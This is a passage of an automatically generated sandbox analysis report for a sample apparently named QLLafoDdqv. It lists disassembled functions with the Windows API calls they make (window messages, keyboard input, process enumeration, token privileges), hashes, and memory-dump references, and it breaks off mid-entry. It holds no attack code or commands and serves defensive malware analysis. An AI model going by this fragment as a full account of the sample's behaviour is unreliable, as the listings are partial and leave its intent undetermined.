              • API String ID: 1881357543-0
              • Opcode ID: ad3b0f5c909d3c1e1f100733a746601fd1c737184abaafb267c9ac0fdb7eec95
              • Instruction ID: 974422cc96980774a948dfe48d44aac70c5fddf3f9d891e5f38b70e175fb0813
              • Opcode Fuzzy Hash: ad3b0f5c909d3c1e1f100733a746601fd1c737184abaafb267c9ac0fdb7eec95
              • Instruction Fuzzy Hash: 8A41B074600300AFE720AF24C886F6977E6AB44719F94844CF95A9F3D2D7B6DD41CB94
              Function 0070B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a75bd3f182b5957677229351e99e0d151c9eae01ddabc56e3d296ac9727fda2b
              • Instruction ID: 17a4a0bf45e9cb12e9dbdb3e74fc3dfbb8614981e19d07e14129025cefb7a297
              • Opcode Fuzzy Hash: a75bd3f182b5957677229351e99e0d151c9eae01ddabc56e3d296ac9727fda2b
              • Instruction Fuzzy Hash: 3241E672A00344EFD7249F78CC45BAABBE9EF88710F10466AF145DB2C2D779AB418780
              Function 007456D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
              Download Yara Rule
              APIs
              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00745783
              • GetLastError.KERNEL32(?,00000000), ref: 007457A9
              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007457CE
              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007457FA
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CreateHardLink$DeleteErrorFileLast
              • String ID:
              • API String ID: 3321077145-0
              • Opcode ID: e4db08bf0b2bc42a7938af6c4ff62fc4d237c67751838d6469f675acbbfd2f1d
              • Instruction ID: 19d179772c79151587568ab2db40ac119efc8d2c874f9c7610a2558297df6b0c
              • Opcode Fuzzy Hash: e4db08bf0b2bc42a7938af6c4ff62fc4d237c67751838d6469f675acbbfd2f1d
              • Instruction Fuzzy Hash: 1F413B39600611DFCB11EF15C444A5EBBE2EF89720B19C489EC4AAB362DB34FD00CB96
              Function 0070D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • MultiByteToWideChar.KERNEL32(?,00000000,?,006F6D71,00000000,00000000,006F82D9,?,006F82D9,?,00000001,006F6D71,?,00000001,006F82D9,006F82D9), ref: 0070D910
              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0070D999
              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0070D9AB
              • __freea.LIBCMT ref: 0070D9B4
                • Part of subcall function 00703820: RtlAllocateHeap.NTDLL(00000000,?,007A1444,?,006EFDF5,?,?,006DA976,00000010,007A1440,006D13FC,?,006D13C6,?,006D1129), ref: 00703852
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
              • String ID:
              • API String ID: 2652629310-0
              • Opcode ID: b476851f3a4df5968cb5d86068522fa21d12f590d995bad01b374c44a84a9b51
              • Instruction ID: c1b40e17bcf029e3c4a033e22c42b00e08f0d2232240b6c3c6f0f950d9e275fc
              • Opcode Fuzzy Hash: b476851f3a4df5968cb5d86068522fa21d12f590d995bad01b374c44a84a9b51
              • Instruction Fuzzy Hash: 9931AB72A1020AEBDF25DFA5DC45EAE7BE5EB41310B054268FC05D6291EB39ED50CBA0
              Function 007652C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00765352
              • GetWindowLongW.USER32(?,000000F0), ref: 00765375
              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00765382
              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007653A8
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: LongWindow$InvalidateMessageRectSend
              • String ID:
              • API String ID: 3340791633-0
              • Opcode ID: c830634590ab639b2e6a12a51eafe71ae96d4850040d1802024a1102fca038ce
              • Instruction ID: 74a88d587b45ce700f330a99fcbc8322841d25d23700ca04147ccd12ebafb0dd
              • Opcode Fuzzy Hash: c830634590ab639b2e6a12a51eafe71ae96d4850040d1802024a1102fca038ce
              • Instruction Fuzzy Hash: ED31D234A55A08EFEB309E16CC05BE93761AB05B98F584102FE13963E1C7BC9D40FB45
              Function 0073AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
              Download Yara Rule
              APIs
              • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 0073ABF1
              • SetKeyboardState.USER32(00000080,?,00008000), ref: 0073AC0D
              • PostMessageW.USER32(00000000,00000101,00000000), ref: 0073AC74
              • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 0073ACC6
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: KeyboardState$InputMessagePostSend
              • String ID:
              • API String ID: 432972143-0
              • Opcode ID: b12347610f4bfd827f86380e5de31e703913f6a021e043e15321e306ae1e54c6
              • Instruction ID: 4b7b3b1ac9315c5ddcbe1a6d3e6fb4fa1a44309f0cfef13c5712f65b20f4a8fd
              • Opcode Fuzzy Hash: b12347610f4bfd827f86380e5de31e703913f6a021e043e15321e306ae1e54c6
              • Instruction Fuzzy Hash: EF311631A44318BFFB258B65CC0A7FABBA5AB45310F08621AE4C1521D2C37D8D818776
              Function 00767674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
              Download Yara Rule
              APIs
              • ClientToScreen.USER32(?,?), ref: 0076769A
              • GetWindowRect.USER32(?,?), ref: 00767710
              • PtInRect.USER32(?,?,00768B89), ref: 00767720
              • MessageBeep.USER32(00000000), ref: 0076778C
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Rect$BeepClientMessageScreenWindow
              • String ID:
              • API String ID: 1352109105-0
              • Opcode ID: a71a00106a43d1d5bf74f2ca9466bbef521f587560e85d651f8a231fb5b32f29
              • Instruction ID: a162db6af1d08b6b5ce15c8300c3bf2b3e68ffba855fc64720179607831c32cf
              • Opcode Fuzzy Hash: a71a00106a43d1d5bf74f2ca9466bbef521f587560e85d651f8a231fb5b32f29
              • Instruction Fuzzy Hash: A441BF34605254DFDB09CF58C894EA977F4FF49398F5580A8E8169B261D738E941CF90
              Function 007616DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
              Download Yara Rule
              APIs
              • GetForegroundWindow.USER32 ref: 007616EB
                • Part of subcall function 00733A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00733A57
                • Part of subcall function 00733A3D: GetCurrentThreadId.KERNEL32 ref: 00733A5E
                • Part of subcall function 00733A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007325B3), ref: 00733A65
              • GetCaretPos.USER32(?), ref: 007616FF
              • ClientToScreen.USER32(00000000,?), ref: 0076174C
              • GetForegroundWindow.USER32 ref: 00761752
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
              • String ID:
              • API String ID: 2759813231-0
              • Opcode ID: 3708eba034757c44ff94988e3667f076601aa2e5a7953d5bec0c509cc885c0c4
              • Instruction ID: daa5d4ddb4cd0e98bb9d438c3849bb0efcdea4d948975f3828bb52b710f76e9b
              • Opcode Fuzzy Hash: 3708eba034757c44ff94988e3667f076601aa2e5a7953d5bec0c509cc885c0c4
              • Instruction Fuzzy Hash: 50314371D00249AFD700DFA9C885CAEBBF9EF48314B5480AAE456E7312D7359E45CBA0
              Function 0073D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
              Download Yara Rule
              APIs
              • CreateToolhelp32Snapshot.KERNEL32 ref: 0073D501
              • Process32FirstW.KERNEL32(00000000,?), ref: 0073D50F
              • Process32NextW.KERNEL32(00000000,?), ref: 0073D52F
              • CloseHandle.KERNEL32(00000000), ref: 0073D5DC
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
              • String ID:
              • API String ID: 420147892-0
              • Opcode ID: 43102ead6edb843ac6589a8d48497081928a2c77253a653b4f6baefeb229450a
              • Instruction ID: a6705e946702535b3b589dc34347f29cdf0d0865955024380f33c3964bd5147c
              • Opcode Fuzzy Hash: 43102ead6edb843ac6589a8d48497081928a2c77253a653b4f6baefeb229450a
              • Instruction Fuzzy Hash: BF31E4721083009FD315EF50D881ABFBBF8EF99344F04082DF582872A2EB719944CBA2
              Function 00768FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006E9BB2
              • GetCursorPos.USER32(?), ref: 00769001
              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00727711,?,?,?,?,?), ref: 00769016
              • GetCursorPos.USER32(?), ref: 0076905E
              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00727711,?,?,?), ref: 00769094
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Cursor$LongMenuPopupProcTrackWindow
              • String ID:
              • API String ID: 2864067406-0
              • Opcode ID: 89452f109dace545edf0aaaf14b86acc4c653e3f025a7b6f1fbeb5b78be43775
              • Instruction ID: 42322d9f4060f75f7cb753a9703aad57fee122301175975b43085c22a8a33ad6
              • Opcode Fuzzy Hash: 89452f109dace545edf0aaaf14b86acc4c653e3f025a7b6f1fbeb5b78be43775
              • Instruction Fuzzy Hash: 0221A135601118EFDF268F94CC58EFA7BB9EF8A360F148069FA0647261C379AD50DB60
              Function 0073D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
              Download Yara Rule
              APIs
              • GetFileAttributesW.KERNEL32(?,0076CB68), ref: 0073D2FB
              • GetLastError.KERNEL32 ref: 0073D30A
              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0073D319
              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0076CB68), ref: 0073D376
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CreateDirectory$AttributesErrorFileLast
              • String ID:
              • API String ID: 2267087916-0
              • Opcode ID: 225abcbbdc2030aa6ddf257f7428573f7ff43848e0b58b3e25f34a44932552f1
              • Instruction ID: 878eefa10e6a3ecdeadd05a7361d48b38d0ccacd56b901c7cf7f31ca1995fcde
              • Opcode Fuzzy Hash: 225abcbbdc2030aa6ddf257f7428573f7ff43848e0b58b3e25f34a44932552f1
              • Instruction Fuzzy Hash: 7D21A370509301DF9320DF24E88186A77E4FE56724F104A1EF499C32A2D735DD49CB97
              Function 00731571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00731014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0073102A
                • Part of subcall function 00731014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00731036
                • Part of subcall function 00731014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00731045
                • Part of subcall function 00731014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0073104C
                • Part of subcall function 00731014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00731062
              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007315BE
              • _memcmp.LIBVCRUNTIME ref: 007315E1
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00731617
              • HeapFree.KERNEL32(00000000), ref: 0073161E
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
              • String ID:
              • API String ID: 1592001646-0
              • Opcode ID: e39eb74af27895508a79b03d8b62a272bf241ba2e86824a1694ca0fc9aca2741
              • Instruction ID: b04a88705c8f971b707be0a36532bd669d936042aafd38777e25c0660ca693b4
              • Opcode Fuzzy Hash: e39eb74af27895508a79b03d8b62a272bf241ba2e86824a1694ca0fc9aca2741
              • Instruction Fuzzy Hash: A421A171E00209EFEF04DFA5C945BEEB7B8EF44344F498459E441AB242EB78AE05CB60
              Function 00762782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
              Download Yara Rule
              APIs
              • GetWindowLongW.USER32(?,000000EC), ref: 0076280A
              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00762824
              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00762832
              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00762840
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$Long$AttributesLayered
              • String ID:
              • API String ID: 2169480361-0
              • Opcode ID: 56c906802462b6fc6c0a39bab4936461358fe5584d4644612c3152981bad7d65
              • Instruction ID: 512d26a49b99b3d5c2c09ffc3dcf6a11aaee83edc54614cd0a3f339f6907a3eb
              • Opcode Fuzzy Hash: 56c906802462b6fc6c0a39bab4936461358fe5584d4644612c3152981bad7d65
              • Instruction Fuzzy Hash: 8D21F131204A12AFD7549B24CC44FAA7B95AF85324F248159F8278B6E3CBB9FC42C7D0
              Function 007378F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00738D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0073790A,?,000000FF,?,00738754,00000000,?,0000001C,?,?), ref: 00738D8C
                • Part of subcall function 00738D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00738DB2
                • Part of subcall function 00738D7D: lstrcmpiW.KERNEL32(00000000,?,0073790A,?,000000FF,?,00738754,00000000,?,0000001C,?,?), ref: 00738DE3
              • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00738754,00000000,?,0000001C,?,?,00000000), ref: 00737923
              • lstrcpyW.KERNEL32(00000000,?), ref: 00737949
              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00738754,00000000,?,0000001C,?,?,00000000), ref: 00737984
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: lstrcmpilstrcpylstrlen
              • String ID: cdecl
              • API String ID: 4031866154-3896280584
              • Opcode ID: 8a3ecb741292d77af76ede96637d5fecdf92caaa37278ea7b8bd975e67c8ad03
              • Instruction ID: 14a86e7195db0197063286ea3d7b59390e413b2559c596c719f51e4e03714405
              • Opcode Fuzzy Hash: 8a3ecb741292d77af76ede96637d5fecdf92caaa37278ea7b8bd975e67c8ad03
              • Instruction Fuzzy Hash: 8011297A200341ABDB295F35D844E7A77A9FF45350F00812AF842C7265EF79E801C755
              Function 00765660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(?,00001060,?,00000004), ref: 007656BB
              • _wcslen.LIBCMT ref: 007656CD
              • _wcslen.LIBCMT ref: 007656D8
              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00765816
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend_wcslen
              • String ID:
              • API String ID: 455545452-0
              • Opcode ID: 5e22cd5e624771397ea6e71fd5f6cc09b6199d8e32833313fc1122a338951d44
              • Instruction ID: 153c91954f252fac200f35e40e8631235ed6b0233978e00d847452b50e385052
              • Opcode Fuzzy Hash: 5e22cd5e624771397ea6e71fd5f6cc09b6199d8e32833313fc1122a338951d44
              • Instruction Fuzzy Hash: 5211E17160060996DB209F61CC85AFE3BACAF01764F10806AFD17D6081EBB89A84DB64
              Function 00731A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(?,000000B0,?,?), ref: 00731A47
              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00731A59
              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00731A6F
              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00731A8A
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend
              • String ID:
              • API String ID: 3850602802-0
              • Opcode ID: 0db5bc7ef365c4fad75e4cb9fd8c47b971479fc893a3b5432b5674b07656fa5d
              • Instruction ID: d050dc0bcc666ff71ba6bbf5a2e7fcef58be7df571c5bca149093995f2db31e4
              • Opcode Fuzzy Hash: 0db5bc7ef365c4fad75e4cb9fd8c47b971479fc893a3b5432b5674b07656fa5d
              • Instruction Fuzzy Hash: 4E11393AD01219FFEB11DBA4CD85FADBB78EB08750F204091EA00B7290D6716E50DB94
              Function 0073E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
              Download Yara Rule
              APIs
              • GetCurrentThreadId.KERNEL32 ref: 0073E1FD
              • MessageBoxW.USER32(?,?,?,?), ref: 0073E230
              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0073E246
              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0073E24D
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
              • String ID:
              • API String ID: 2880819207-0
              • Opcode ID: 3cdd76d3918cf4967e0559cc67001307065ecfb3bfe60055ff384b841d1ed345
              • Instruction ID: 19fcc23b3707f97169b35283579863d0f19f3a942641416533e8f0b128019990
              • Opcode Fuzzy Hash: 3cdd76d3918cf4967e0559cc67001307065ecfb3bfe60055ff384b841d1ed345
              • Instruction Fuzzy Hash: 78112BB2904358BBEB019FA89C05AAF7FADAB86310F008215F915E32D1D2B8DD0087A4
              Function 006FD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
              Download Yara Rule
              APIs
